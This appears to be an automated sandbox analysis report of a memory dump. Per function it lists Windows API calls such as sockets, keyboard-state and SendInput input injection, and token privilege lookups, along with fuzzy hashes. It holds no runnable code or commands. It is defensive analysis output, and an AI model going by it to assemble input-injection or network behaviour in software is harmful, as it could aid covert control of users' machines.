Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: c257532dd52d269c382119c2a845a021f55b75ae92bd59ab8bb39e4473bad32c
Instruction ID: 109d92919733df195757c59c1f53ac0c681beeda3e21f2198e514469a2607491
Opcode Fuzzy Hash: c257532dd52d269c382119c2a845a021f55b75ae92bd59ab8bb39e4473bad32c
Instruction Fuzzy Hash: 8751D6306183029BDF24AF69E895A3EB3E5BF59310F24881FF596CB6D1DB709880DB11

Uniqueness

Uniqueness Score: -1.00%

Function 0016493A, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001649D0
__flush.LIBCMT ref: 001649F0
__write.LIBCMT ref: 00164A23
__flsbuf.LIBCMT ref: 00164A51

Part of subcall function 00168D68: __getptd_noexit.LIBCMT ref: 00168D68

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 435e28485697a51ef5e20de7f00e570821608ee35dc79d17666abcae11e36720
Instruction ID: fa74040151d5b66ee3e43b83b9914cd7defe7a3a677eb53bfbb7d86a6d97e4cd
Opcode Fuzzy Hash: 435e28485697a51ef5e20de7f00e570821608ee35dc79d17666abcae11e36720
Instruction Fuzzy Hash: 6741E334A80606AFDF28CEA9CC909BF7BA6EF84364B24813DE856C7640D7709D60CB44

Uniqueness

Uniqueness Score: -1.00%

Function 001B6CBD, Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 001B6CE4
WSAGetLastError.WSOCK32(00000000), ref: 001B6CF4

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001B6D58
WSAGetLastError.WSOCK32(00000000), ref: 001B6D64

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 37b4db2e7ac931eca6a2a921070a14505a45e126aae88667ab44ee1cbd606f40
Instruction ID: 9967c12784024b9638342eb954709a909c7c4369f3b67b5c045e67dfad3a873d
Opcode Fuzzy Hash: 37b4db2e7ac931eca6a2a921070a14505a45e126aae88667ab44ee1cbd606f40
Instruction Fuzzy Hash: 2341B174740200AFEB20AF24DC86F7E77E5DB58B10F448058FA59AB3E2DB749D018B91

Uniqueness

Uniqueness Score: -1.00%

Function 001B672D, Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,001CF910), ref: 001B67BA
_strlen.LIBCMT ref: 001B67EC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 9049dbd96c210009cc50ce725e1c7b4659143f14f69e41d5562858035020fd1b
Instruction ID: 21519e107d09cd31168ae08fa50688db11be3c84c49e49e0e6097282adbcbe5e
Opcode Fuzzy Hash: 9049dbd96c210009cc50ce725e1c7b4659143f14f69e41d5562858035020fd1b
Instruction Fuzzy Hash: 7741A971A00204AFCB14EBA4DCD5FEEB7A9EF64314F148169F815972A2DF34AD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C8AC0, Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001C8B4D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 0eccd811d793a390d1fcf77e8e6ca02a6392a8677301991472d7655463c69d42
Instruction ID: 26d5d660dc1e0ce6da4fcca5a2c7e44df791e3ccfb4b1e03d8eb1c2adfbff7aa
Opcode Fuzzy Hash: 0eccd811d793a390d1fcf77e8e6ca02a6392a8677301991472d7655463c69d42
Instruction Fuzzy Hash: FC31A1B4600208BEEB249E18CCC9FA977A5EB25310F24451EFA51D72E1CF31ED90D651

Uniqueness

Uniqueness Score: -1.00%

Function 001CADF1, Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 001CAE1A
GetWindowRect.USER32 ref: 001CAE90
PtInRect.USER32(?,?,001CC304), ref: 001CAEA0
MessageBeep.USER32(00000000), ref: 001CAF11

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 231ad471173b970e85b085e91879a6bcf7f0eca8e8805680190d29e9631fec29
Instruction ID: 1491229ffd3dfde37930df2c91e154efbcc09e1748f18ae1f828ba3f5fc4cef0
Opcode Fuzzy Hash: 231ad471173b970e85b085e91879a6bcf7f0eca8e8805680190d29e9631fec29
Instruction Fuzzy Hash: 81416A70A002199FCB12CF58D888FA9BBF5FF69344F5881ADE5148B251D730E942CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001A0FE6, Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 001A1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 001A1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001A10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001A110B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b0c7ddb61a62d0c584f20f34879fb4a4b3eddd2f4f3fef75b80aed4b56f4526f
Instruction ID: 5fcf1c062b3b6205e68cf64c474bb64dc5485c517b1891aa3cbe9bd32e946bb2
Opcode Fuzzy Hash: b0c7ddb61a62d0c584f20f34879fb4a4b3eddd2f4f3fef75b80aed4b56f4526f
Instruction Fuzzy Hash: B9317838E40698BEFF358B658D05BFEBBAAAB5B310F08431AF580521D0C3748DC58751

Uniqueness

Uniqueness Score: -1.00%

Function 001A1121, Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,774273F0,?,00008000), ref: 001A1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 001A1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 001A11F1
SendInput.USER32(00000001,?,0000001C,774273F0,?,00008000), ref: 001A1243

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 48d68b3f621a66e8cf56d4fb28c0dafd9c323fc22038fd4fb1ba1fb695ef11e9
Instruction ID: a6c0257576be123c9de2b1c04d9d4c8f6eaf111e3753034fcd4362c3a2a402f5
Opcode Fuzzy Hash: 48d68b3f621a66e8cf56d4fb28c0dafd9c323fc22038fd4fb1ba1fb695ef11e9
Instruction Fuzzy Hash: 3E312638A807187EEF258B758C04BFEBBBBAB5B310F14431FE681925D1C33489959751

Uniqueness

Uniqueness Score: -1.00%

Function 00176415, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0017644B
__isleadbyte_l.LIBCMT ref: 00176479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001764A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001764DD

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 86401525a25bb4f5cdef409fb2651255175af72c979b343a8ca36540fa5fd2af
Instruction ID: 9a956b4aa911ec8c79aa0872095c1820c21a2eabed49ff92ea83dcab03f0e3ce
Opcode Fuzzy Hash: 86401525a25bb4f5cdef409fb2651255175af72c979b343a8ca36540fa5fd2af
Instruction Fuzzy Hash: 8A31CF31600A46EFDB258F75CC45BBA7BB5FF41310F198029F86A971A1EB31D891DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C5175, Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001C5189

Part of subcall function 001A387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001A3897
Part of subcall function 001A387D: GetCurrentThreadId.KERNEL32 ref: 001A389E
Part of subcall function 001A387D: AttachThreadInput.USER32(00000000,?,001A52A7), ref: 001A38A5

GetCaretPos.USER32(?), ref: 001C519A
ClientToScreen.USER32(00000000,?), ref: 001C51D5
GetForegroundWindow.USER32 ref: 001C51DB

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 73a23d624888065dbc893d35d0823cbca7ba5bde9fd0604ecfa9e3ba6715a399
Instruction ID: 469d1a378065eb9df67f004e93f7235da6b33188d987d00f1693e21563db47f3
Opcode Fuzzy Hash: 73a23d624888065dbc893d35d0823cbca7ba5bde9fd0604ecfa9e3ba6715a399
Instruction Fuzzy Hash: 01310E71900118AFDB04EFA5C845EEFB7F9EF98300F10406AE415E7251DB759E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CC788, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

GetCursorPos.USER32(?,?,?,?,?,?,?,?,0017BBFB,?,?,?,?,?), ref: 001CC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0017BBFB,?,?,?,?,?), ref: 001CC7D7
GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,0017BBFB,?,?,?,?,?), ref: 001CC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0017BBFB,?,?,?), ref: 001CC85E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d8b3fb83e50b0d16bbf6c0b91d2581c68f8435cfb757109d04872088981b9127
Instruction ID: 5315c9f2bdde3d7c7cac044c7bbe2d551859daa85cfa8a1e20a50e0549ad5604
Opcode Fuzzy Hash: d8b3fb83e50b0d16bbf6c0b91d2581c68f8435cfb757109d04872088981b9127
Instruction Fuzzy Hash: AB318D35600118AFCB15CF58C8A8EEBBBBAEB59310F04406DF9098B661C731DDA1DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00198B9E, Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00198652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00198669
Part of subcall function 00198652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00198673
Part of subcall function 00198652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00198682
Part of subcall function 00198652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00198689
Part of subcall function 00198652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0019869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00198BEB
_memcmp.LIBCMT ref: 00198C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00198C44
HeapFree.KERNEL32(00000000), ref: 00198C4B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 1d0bf9b109bd7cb1abb8898b6d9674ce78b0f69b03dbe7639b6f142599e2b46c
Instruction ID: ab004a5a27dbf18f99427847e588dc07ad62102e62f992065b5f6d6a1a585c5e
Opcode Fuzzy Hash: 1d0bf9b109bd7cb1abb8898b6d9674ce78b0f69b03dbe7639b6f142599e2b46c
Instruction Fuzzy Hash: 75218C71E41208EFDF10DFA4C945BEEB7B8EF45355F19405AE454AB240DB31AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0019E1AF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0019E1C4,?,?,?,0019EFB7,00000000,000000EF,00000119,?,?), ref: 0019F5BC
Part of subcall function 0019F5AD: lstrcpyW.KERNEL32 ref: 0019F5E2
Part of subcall function 0019F5AD: lstrcmpiW.KERNEL32(00000000,?,0019E1C4,?,?,?,0019EFB7,00000000,000000EF,00000119,?,?), ref: 0019F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0019EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0019E1DD
lstrcpyW.KERNEL32 ref: 0019E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0019EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0019E237

Strings

cdecl, xrefs: 0019E22E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 56125ea0c6ba70ed2ed287911ccca54aaaa731a52c3090a4ceddbc363670bc26
Instruction ID: a8a16f29e84bcda59aa3eeab3fe030057c52e74c67e7697f62ce46523f723240
Opcode Fuzzy Hash: 56125ea0c6ba70ed2ed287911ccca54aaaa731a52c3090a4ceddbc363670bc26
Instruction Fuzzy Hash: 05118E3A200345EFDF25AF64DC45E7A77A9FF89750B44402AF806CB260EB71D851D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00175332, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00175351

Part of subcall function 0016594C: __FF_MSGBANNER.LIBCMT ref: 00165963
Part of subcall function 0016594C: __NMSG_WRITE.LIBCMT ref: 0016596A
Part of subcall function 0016594C: RtlAllocateHeap.NTDLL(00A80000,00000000,00000001,?,?,?,?,00161013,?,0000FFFF), ref: 0016598F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 44b65616f0bd533597b9eb21f3e25b35017e2b65b387d3b1cdc01be501035fe4
Instruction ID: 876b657d53d0e352d209912a8285a25666727cdd009f34b3782986cb2afdbedc
Opcode Fuzzy Hash: 44b65616f0bd533597b9eb21f3e25b35017e2b65b387d3b1cdc01be501035fe4
Instruction Fuzzy Hash: 0C11E732904A15AFCB213F70AC0466D3BA6BF203A0F20852AF909961B1DFF589918760

Uniqueness

Uniqueness Score: -1.00%

Function 001A40B1, Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001A40D1
_memset.LIBCMT ref: 001A40F2
DeviceIoControl.KERNEL32 ref: 001A4144
CloseHandle.KERNEL32(00000000), ref: 001A414D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: f553f8c4f90f6e8c194d6a21cfbfb566e673516074ac6646d6754be0b228c9d9
Instruction ID: d498413c7a87d9d484c92e5c57a04ac80eca4cf56645a934b12b1ad55ac7bba5
Opcode Fuzzy Hash: f553f8c4f90f6e8c194d6a21cfbfb566e673516074ac6646d6754be0b228c9d9
Instruction Fuzzy Hash: 3611CA759012287AD7309BA5AC4DFEBBB7CEF85760F1041AAF908D7180D7748E84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001B667C, Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00145B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001A7B20,?,?,00000000), ref: 00145B8C
Part of subcall function 00145B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001A7B20,?,?,00000000,?,?), ref: 00145BB0

gethostbyname.WSOCK32(?,?,?), ref: 001B66AC
WSAGetLastError.WSOCK32(00000000), ref: 001B66B7
_memmove.LIBCMT ref: 001B66E4
inet_ntoa.WSOCK32(?), ref: 001B66EF

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 207494be41d96bfe8a285f69851c8902a48c5a1d1fdbdedac7dedf81279398ab
Instruction ID: e8e3e2a616ff5b550f4d79ab83479b54dda9d379b71711caac29297ee3a91a73
Opcode Fuzzy Hash: 207494be41d96bfe8a285f69851c8902a48c5a1d1fdbdedac7dedf81279398ab
Instruction Fuzzy Hash: FB116D35500509AFCF04EBA4DD86DEEB7BAEF64310B148069F506A7272DF30AE44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00199023, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00199043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00199055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0019906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00199086

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fdbd39189732e23a92e414d75823ac5c2699404cd74196a450822df4c4c6c24c
Instruction ID: 3ae946f48e1026d518b307b02db3db6b28fb19e0a5733b574430c93fd708bd47
Opcode Fuzzy Hash: fdbd39189732e23a92e414d75823ac5c2699404cd74196a450822df4c4c6c24c
Instruction Fuzzy Hash: DA113A79901218BFDF10DFA9C984E9DBB78FB48310F204095E914B7250D7726E50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00141290, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

DefDlgProcW.USER32(?,00000020,?), ref: 001412D8
GetClientRect.USER32 ref: 0017B84B
GetCursorPos.USER32(?), ref: 0017B855
ScreenToClient.USER32 ref: 0017B860

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 14c5201e00bce37e2c625b06108fe3fc885437c4c7198e1f8475ff835ef8688f
Instruction ID: 8ed43000cfe86410db504ea02f657edc72a8e958424c3e560da48956145a96da
Opcode Fuzzy Hash: 14c5201e00bce37e2c625b06108fe3fc885437c4c7198e1f8475ff835ef8688f
Instruction Fuzzy Hash: 0F114C35A00119BFCB00DF94D889DFE7BB9FB15300F60445AF901E7161D770BA928BA5

Uniqueness

Uniqueness Score: -1.00%

Function 001A1652, Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001A01FD,?,001A1250,?,00008000), ref: 001A166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,001A01FD,?,001A1250,?,00008000), ref: 001A1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001A01FD,?,001A1250,?,00008000), ref: 001A169E
Sleep.KERNEL32(?,?,?,?,?,?,?,001A01FD,?,001A1250,?,00008000), ref: 001A16D1

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 2594d7de0beaab996a3d976b08d82b5881464a37a3dcd347150d73334b71cbe0
Instruction ID: 1fbd9dab477ec4c474d9c985203b97aa5197fac55fd99cd6aac5e8f157669e40
Opcode Fuzzy Hash: 2594d7de0beaab996a3d976b08d82b5881464a37a3dcd347150d73334b71cbe0
Instruction Fuzzy Hash: A9117C35C0091CEBCF049FA5D848AEEBF78FF0A701F49405AE948F2240CB7095A08BD6

Uniqueness

Uniqueness Score: -1.00%

Function 00177207, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0017722B

Part of subcall function 00177912: __fltout2.LIBCMT ref: 0017793B

__cftog_l.LIBCMT ref: 00177251
__cftoe_l.LIBCMT ref: 00177283

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
